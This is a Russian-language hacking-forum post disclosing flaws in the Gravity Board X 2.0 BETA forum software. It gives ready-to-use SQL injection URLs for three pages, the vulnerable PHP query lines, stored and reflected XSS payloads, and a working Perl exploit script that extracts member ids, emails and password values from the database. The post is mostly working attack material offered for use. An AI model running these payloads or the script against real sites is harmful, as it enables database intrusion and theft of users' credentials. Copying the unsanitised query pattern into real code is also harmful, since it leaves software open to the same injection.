Старый 14.07.2010, 09:50   #1
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию Уязвимости Gravity Board X 2.0

Название: Gravity Board X
Офф. сайт: http://www.gravityboardx.com
Версия: 2.0 BETA (Public Release 3)
Цитата:
/index.php?action=viewprofile&member_id=-2'+union+select+concat_ws(0x3a,user(),database(),v ersion())+--+
Уязвимый код:
PHP код:
$miquery mysql_query("SELECT * FROM " $prefix "members WHERE memberid = '{$_GET['member_id']}'") OR DIE("Gravity Board X was unable get the member data requested from the members database: " mysql_error()); 
Цитата:
index.php?action=viewpm&imid=-1'+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5,6,7,8,9,10+--+
PHP код:
 $imquery mysql_query("SELECT * FROM " $prefix "ims WHERE imid='{$_GET['imid']}' AND imto='{$_SESSION['memberid']}'"$connection) OR DIE("Gravity Board X was unable to retrieve your personal message from the database: " mysql_error()); 
Цитата:
/index.php?action=viewboard&board_id=-2'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3+--+
Активная XSS.
/index.php?action=newpm
В поле Message(Сообщение)
Код:
<script>alert();</script>
/index.php?action=postnew&board_id=[Номер категории]
Имя: Bla
Message:
Цитата:
<script>alert();</script>
Пассивная XSS:
Цитата:
/index.php?action=viewthread&thread_id="><script>al ert()</script>
Быдлосплойт:
Код:
 #!/usr/bin/perl  
use LWP::Simple; 
print "\n"; 
print "##################################################  ############\n"; 
print "# Gravity Board X 2.0 BETA (Public Release 3) SQL INJECTION  #\n"; 
print "# Big Thanks to Slip :)                                      #\n"; 
print "# Require : Magic_quotes = Off                               #\n"; 
print "##################################################  ############\n"; 
if (@ARGV < 2) 
{ 
print "\n Usage: exploit.pl [host] [path] "; 
print "\n EX : exploit.pl www.localhost.com /path/ prefix \n\n"; 
exit; 
} 
$host=$ARGV[0]; 
$path=$ARGV[1]; 
$prefix=$ARGV[2];   #  PREFIX TABLES, Default: gbx 
$vuln = "-2'+union+select+concat(0x3a3a3a,memberid,0x3a,emai  l,0x3a,pw,0x3a3a3a)+from+".$prefix."_members"; 
$doc = get($host.$path."index.php?action=viewprofile&member_id=".$vuln."+--+"); 
if ($doc =~ /:::(.+):(.+):(.+):::/){ 
        print "\n[+] Admin id: : $1"; 
                print "\n[+] Admin email: $2"; 
                print "\n[+] Admin password: $3"; 
}
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot